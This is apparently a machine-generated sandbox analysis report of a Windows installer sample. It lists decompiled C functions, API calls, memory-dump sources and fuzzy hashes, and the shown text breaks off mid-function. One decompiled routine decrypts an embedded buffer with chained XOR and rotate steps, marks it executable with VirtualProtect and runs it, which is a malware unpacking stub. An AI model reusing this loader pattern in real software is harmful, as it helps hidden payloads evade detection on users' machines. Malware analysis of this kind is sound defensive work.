                                                                0x0040218c
                                                                0x004021a1
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0040218c
                                                                0x00402197
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                • API String ID: 123533781-1943935188
                                                                • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                                • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                                • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                                • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 39%
                                                                			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                0x00402689
                                                                0x0040269d
                                                                0x004026a8
                                                                0x004026a9
                                                                0x004027e4
                                                                0x0040268b
                                                                0x0040268b
                                                                0x0040268d
                                                                0x0040268f
                                                                0x0040268f
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                                • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                                • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                                • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732257DE, Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID: {S"s
                                                                • API String ID: 0-2638089934
                                                                • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                • Instruction ID: a1b4a54d192d77d6d1bc6dc73d4c41c358644402b7d611a99cbb29066f66b405
                                                                • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                • Instruction Fuzzy Hash: E6E06D757606099FC704CBA8DC41E15B3F8EB08220B218290EC15C73A0E674EE809B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732230BA, Relevance: .2, Instructions: 153memoryCOMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E732230BA() {
				void* _t223;

				L0:
				while(1) {
					L0:
					 *(_t223 - 8) =  *(_t223 - 8) + 1;
					L1:
					if( *(_t223 - 8) < 0x1298) {
						L2:
						_t5 =  &E732250D8 +  *(_t223 - 8); // 0x0
						 *(_t223 - 1) =  *_t5;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) +  *(_t223 - 8);
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^ 0x00000014;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) + 0xe3;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t223 - 1) & 0x000000ff) << 0x00000003;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^ 0x0000004b;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0x74;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t223 - 1) & 0x000000ff) << 0x00000003;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) + 0xf9;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t223 - 1) & 0x000000ff) << 0x00000005;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) + 0x36;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t223 - 1) & 0x000000ff) << 0x00000007;
						 *(_t223 - 1) =  ~( *(_t223 - 1) & 0x000000ff);
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^ 0x000000d3;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) +  *(_t223 - 8);
						 *(_t223 - 1) =  ~( *(_t223 - 1) & 0x000000ff);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0x9b;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^ 0x000000ee;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) -  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t223 - 1) & 0x000000ff) << 0x00000005;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t223 - 1) & 0x000000ff) << 0x00000006;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t223 - 1) & 0x000000ff) << 0x00000002;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) +  *(_t223 - 8);
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^ 0x000000b6;
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0xc;
						 *(_t223 - 1) =  ~( *(_t223 - 1) & 0x000000ff);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0xae;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0x20;
						 *(_t223 - 1) =  ~( *(_t223 - 1) & 0x000000ff);
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) + 0xb9;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0x51;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *(_t223 - 1) = ( *(_t223 - 1) & 0x000000ff) - 0xce;
						 *(_t223 - 1) =  *(_t223 - 1) & 0x000000ff ^  *(_t223 - 8);
						 *((char*)( &E732250D8 +  *(_t223 - 8))) =  *(_t223 - 1);
						continue;
					}
					L3:
					VirtualProtect( &E732250D8, 0x1298, 0x40, _t223 - 0x10); // executed
					E732250D8(); // executed
					L4:
					return 0;
					L5:
				}
			}




                                                                0x732230ba
                                                                0x732230ba
                                                                0x732230ba
                                                                0x732230be
                                                                0x732230c1
                                                                0x732230c8
                                                                0x732230ce
                                                                0x732230d1
                                                                0x732230d7
                                                                0x732230e1
                                                                0x732230eb
                                                                0x732230f5
                                                                0x73223101
                                                                0x73223114
                                                                0x7322311e
                                                                0x73223128
                                                                0x7322313b
                                                                0x73223147
                                                                0x7322315a
                                                                0x73223164
                                                                0x73223176
                                                                0x7322317f
                                                                0x7322318b
                                                                0x73223195
                                                                0x7322319e
                                                                0x732231aa
                                                                0x732231b6
                                                                0x732231c0
                                                                0x732231d3
                                                                0x732231dd
                                                                0x732231f0
                                                                0x732231fa
                                                                0x7322320d
                                                                0x73223217
                                                                0x73223221
                                                                0x7322322d
                                                                0x73223237
                                                                0x73223240
                                                                0x7322324c
                                                                0x73223256
                                                                0x73223260
                                                                0x73223269
                                                                0x73223273
                                                                0x7322327f
                                                                0x73223289
                                                                0x73223293
                                                                0x7322329d
                                                                0x732232a9
                                                                0x732232b3
                                                                0x732232bc
                                                                0x00000000
                                                                0x732232bc
                                                                0x732232c7
                                                                0x732232d7
                                                                0x732232e2
                                                                0x732232e4
                                                                0x732232e9
                                                                0x00000000
                                                                0x732232e9

                                                                APIs
                                                                • VirtualProtect.KERNEL32(732250D8,00001298,00000040,?), ref: 732232D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: dca0053b882739ae742d2984385b1ea20641ffa0bc44151c4a299d11507325e2
                                                                • Instruction ID: 2a18cc569a346dbce67f992333f6adb6273ae1d99e3a1fab9efda3b64ad76637
                                                                • Opcode Fuzzy Hash: dca0053b882739ae742d2984385b1ea20641ffa0bc44151c4a299d11507325e2
                                                                • Instruction Fuzzy Hash: 6B710650C5D2EDADCB06CBF944647FDBFB05E26111F4945DAE0E1A6243C13A938EDB21
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732256EE, Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                • Instruction ID: a1cb5a776df0fade2825612a96d8e7b32e8421b27fcdd4e8c0454deeff6e38e9
                                                                • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                • Instruction Fuzzy Hash: 09112971A10109DFCB10DBA9DC84AADFBFEEF44692B658066EC06D3304E770DE80C660
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 7322581C, Relevance: .0, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                • Instruction ID: 7d8c5e9f1075432ea1fe3e1ac4e5b7636587162f5e978146ee14bd4453bd256d
                                                                • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                • Instruction Fuzzy Hash: 21E086727115508BC351CA59D980E52FBF9EF881B272A846AEC46D7710C7B0FC81C650
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 7322579F, Relevance: .0, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x7783bd
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x776990
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x771a18
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                                                                0x00403fac
                                                                0x004040d2
                                                                0x0040412e
                                                                0x00404132
                                                                0x00404209
                                                                0x0040420b
                                                                0x0040420b
                                                                0x00404211
                                                                0x00404211
                                                                0x00404214
                                                                0x00000000
                                                                0x0040421b
                                                                0x00404140
                                                                0x00404142
                                                                0x0040414c
                                                                0x00404157
                                                                0x0040415a
                                                                0x0040415d
                                                                0x00404168
                                                                0x0040416b
                                                                0x00404172
                                                                0x00404180
                                                                0x00404198
                                                                0x004041a0
                                                                0x004041ab
                                                                0x004041bb
                                                                0x004041bd
                                                                0x004041bd
                                                                0x00404172
                                                                0x004041c7
                                                                0x00000000
                                                                0x004041d2
                                                                0x004041d6
                                                                0x004041e7
                                                                0x004041e7
                                                                0x004041ed
                                                                0x004041fb
                                                                0x004041fb
                                                                0x00000000
                                                                0x004041ff
                                                                0x004041c7
                                                                0x004040dd
                                                                0x00000000
                                                                0x004040f1
                                                                0x004040f7
                                                                0x004040fd
                                                                0x00000000
                                                                0x00000000
                                                                0x00404122
                                                                0x00404124
                                                                0x00404129
                                                                0x00000000
                                                                0x00404129
                                                                0x004040dd
                                                                0x00403fb2
                                                                0x00403fb5
                                                                0x00403fba
                                                                0x00403fbc
                                                                0x00403fcb
                                                                0x00403fcb
                                                                0x00403fcd
                                                                0x00403fd2
                                                                0x00403fd5
                                                                0x00403fd7
                                                                0x00403fdc
                                                                0x00403fe5
                                                                0x00403feb
                                                                0x00403ff7
                                                                0x00403ffa
                                                                0x00404003
                                                                0x00404008
                                                                0x0040400b
                                                                0x00404010
                                                                0x00404027
                                                                0x0040402e
                                                                0x00404041
                                                                0x00404044
                                                                0x00404059
                                                                0x0040405b
                                                                0x00404060
                                                                0x00404065
                                                                0x0040406a
                                                                0x0040406a
                                                                0x00404079
                                                                0x00404088
                                                                0x0040408a
                                                                0x004040a0
                                                                0x004040af
                                                                0x004040b1
                                                                0x00000000

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                • String ID: N$open$.B
                                                                • API String ID: 3615053054-720656042
                                                                • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                                • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                                • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222880, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 119synchronizationthreadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E73222880(void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _t45;

				_v8 = _a4;
				_t45 = _a4;
				0x73220000("%p %d %p\n", _t45, _a8, _a12);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					0x73220000(0);
					if(_t45 == 0) {
						if( *(_v8 + 8) == 0) {
							_v16 = CreateEventW(0, 0, 0, 0);
							 *(_v8 + 0x14) = _v16;
							if(_v16 != 0) {
								L11:
								 *((intOrPtr*)(_v8 + 0x10)) = _a12;
								 *(_v8 + 0xc) = _a8 * 0x3e8;
								_v20 = CreateThread(0, 0, E73222EC0, _v8, 0, 0);
								 *(_v8 + 8) = _v20;
								if(_v20 != 0) {
									LeaveCriticalSection(0x732250ac);
									return 0;
								}
								_v12 = GetLastError();
								CloseHandle( *(_v8 + 0x14));
								LeaveCriticalSection(0x732250ac);
								return _v12;
							}
							_v12 = GetLastError();
							LeaveCriticalSection(0x732250ac);
							return _v12;
						}
						_v24 =  *(_v8 + 8);
						SetEvent( *(_v8 + 0x14));
						LeaveCriticalSection(0x732250ac);
						WaitForSingleObject(_v24, 0xffffffff);
						EnterCriticalSection(0x732250ac);
						if( *_v8 == 0x50444830) {
							CloseHandle( *(_v8 + 8));
							 *(_v8 + 8) = 0;
							goto L11;
						}
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					}
					LeaveCriticalSection(0x732250ac);
					return 0x800007d5;
				}
			}









                                                                0x73222889
                                                                0x73222894
                                                                0x7322289d
                                                                0x732228aa
                                                                0x732228b4
                                                                0x732228c6
                                                                0x00000000
                                                                0x732228d6
                                                                0x732228d8
                                                                0x732228e2
                                                                0x73222900
                                                                0x73222981
                                                                0x7322298a
                                                                0x73222991
                                                                0x732229ac
                                                                0x732229b2
                                                                0x732229bf
                                                                0x732229d9
                                                                0x732229e2
                                                                0x732229e9
                                                                0x73222a16
                                                                0x00000000
                                                                0x73222a1c
                                                                0x732229f1
                                                                0x732229fb
                                                                0x73222a06
                                                                0x00000000
                                                                0x73222a0c
                                                                0x73222999
                                                                0x732229a1
                                                                0x00000000
                                                                0x732229a7
                                                                0x73222908
                                                                0x73222912
                                                                0x7322291d
                                                                0x73222929
                                                                0x73222934
                                                                0x73222943
                                                                0x73222961
                                                                0x7322296a
                                                                0x00000000
                                                                0x7322296a
                                                                0x7322294a
                                                                0x00000000
                                                                0x73222950
                                                                0x732228e9
                                                                0x00000000
                                                                0x732228ef

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 732228AA
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732228C6
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732228E9
                                                                • SetEvent.KERNEL32(?), ref: 73222912
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322291D
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 73222929
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73222934
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322294A
                                                                • CloseHandle.KERNEL32(?), ref: 73222961
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 7322297B
                                                                • GetLastError.KERNEL32 ref: 73222993
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732229A1
                                                                • CreateThread.KERNEL32 ref: 732229D3
                                                                • GetLastError.KERNEL32 ref: 732229EB
                                                                • CloseHandle.KERNEL32(?), ref: 732229FB
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73222A06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$CloseCreateEnterErrorEventHandleLast$ObjectSingleThreadWait
                                                                • String ID: %p %d %p$0HDP$0HDP
                                                                • API String ID: 2526439713-1318182531
                                                                • Opcode ID: a84e78963f4fad98b12a91a8a83dbe104aa17bfb6d8500bfc5c692baf80fe2ab
                                                                • Instruction ID: 3195c608c86ed28ebd62a6acac8819e0f46644604e7eae6ca97ca2fb92b1ba97
                                                                • Opcode Fuzzy Hash: a84e78963f4fad98b12a91a8a83dbe104aa17bfb6d8500bfc5c692baf80fe2ab
                                                                • Instruction Fuzzy Hash: 67512A75A00218EFD718DFA5CE48B5DBBB5BB18306F328144F909AB282D7759A80DF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221EA0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 74%
                                                                			E73221EA0(WCHAR** _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v36;
				short _v2084;
				int _t80;
				void* _t122;
				void* _t123;
				void* _t124;

				_v12 = 0;
				0x73220000("%p %p %p 0x%08x\n", _a4, _a8, _a12, _a16);
				_t124 = _t123 + 0x14;
				if(_a16 != 0) {
					0x73220000("unimplemented flags 0x%08x\n", _a16);
					_t124 = _t124 + 8;
				}
				if(_a4 == 0 || _a4[5] == 0 || _a4[1] == 0 || _a12 == 0) {
